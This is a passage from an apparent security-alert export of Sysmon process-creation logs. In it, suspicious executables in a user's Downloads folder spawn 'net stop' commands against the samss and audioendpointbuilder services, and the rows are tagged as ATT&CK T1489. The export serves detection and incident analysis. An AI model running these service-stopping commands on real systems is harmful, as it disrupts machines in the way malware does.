/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:26.102796300Z"",""eventRecordID"":""1102"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:25.908\r\nProcessGuid: {df9fc3d3-d199-5ec7-0000-00108c302500}\r\nProcessId: 88508\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400}\r\nParentProcessId: 85008\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:25.908"",""processGuid"":""{df9fc3d3-d199-5ec7-0000-00108c302500}"",""processId"":""88508"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d197-5ec7-0000-001040e52400}"",""parentProcessId"":""85008"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:38:32.964",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:24.042 +ProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400} +ProcessId: 86532 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:24.055193400Z"",""eventRecordID"":""1100"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:24.042\r\nProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400}\r\nProcessId: 86532\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:24.042"",""processGuid"":""{df9fc3d3-d198-5ec7-0000-001007f72400}"",""processId"":""86532"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:38:32.129",9,"Windows Application error event","""Faulting application name: taskhostw.exe, version: 10.0.18362.387, time stamp: 0x5fefc7f9 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xd6c +Faulting application start time: 0x01d6303b4db78973 +Faulting application path: C:\Windows\system32\taskhostw.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4498a57d-5e80-4b6b-89ed-aa13bfe0863c +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:38:31.766",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:23.209 +ProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400} +ProcessId: 85008 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:23.216784400Z"",""eventRecordID"":""1099"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:23.209\r\nProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400}\r\nProcessId: 85008\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:23.209"",""processGuid"":""{df9fc3d3-d197-5ec7-0000-001040e52400}"",""processId"":""85008"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:38:25.881",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:17.278 +ProcessGuid: {df9fc3d3-d191-5ec7-0000-001024f02300} +ProcessId: 72068 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300} +ParentProcessId: 70160 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:17.295002800Z"",""eventRecordID"":""1096"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:17.278\r\nProcessGuid: {df9fc3d3-d191-5ec7-0000-001024f02300}\r\nProcessId: 72068\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300}\r\nParentProcessId: 70160\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:17.278"",""processGuid"":""{df9fc3d3-d191-5ec7-0000-001024f02300}"",""processId"":""72068"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d190-5ec7-0000-001004d72300}"",""parentProcessId"":""70160"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:38:25.517",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:17.019 +ProcessGuid: {df9fc3d3-d191-5ec7-0000-0010c8df2300} +ProcessId: 70884 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300} +ParentProcessId: 68684 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:17.024798500Z"",""eventRecordID"":""1095"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:17.019\r\nProcessGuid: {df9fc3d3-d191-5ec7-0000-0010c8df2300}\r\nProcessId: 70884\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300}\r\nParentProcessId: 68684\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:17.019"",""processGuid"":""{df9fc3d3-d191-5ec7-0000-0010c8df2300}"",""processId"":""70884"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d190-5ec7-0000-00109cc32300}"",""parentProcessId"":""68684"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:38:25.414",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:16.888 +ProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300} +ProcessId: 70160 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:16.923482900Z"",""eventRecordID"":""1094"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:16.888\r\nProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300}\r\nProcessId: 70160\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:16.888"",""processGuid"":""{df9fc3d3-d190-5ec7-0000-001004d72300}"",""processId"":""70160"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:25.368",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:16.457 +ProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300} +ProcessId: 68684 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:16.480866900Z"",""eventRecordID"":""1093"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:16.457\r\nProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300}\r\nProcessId: 68684\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:16.457"",""processGuid"":""{df9fc3d3-d190-5ec7-0000-00109cc32300}"",""processId"":""68684"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop 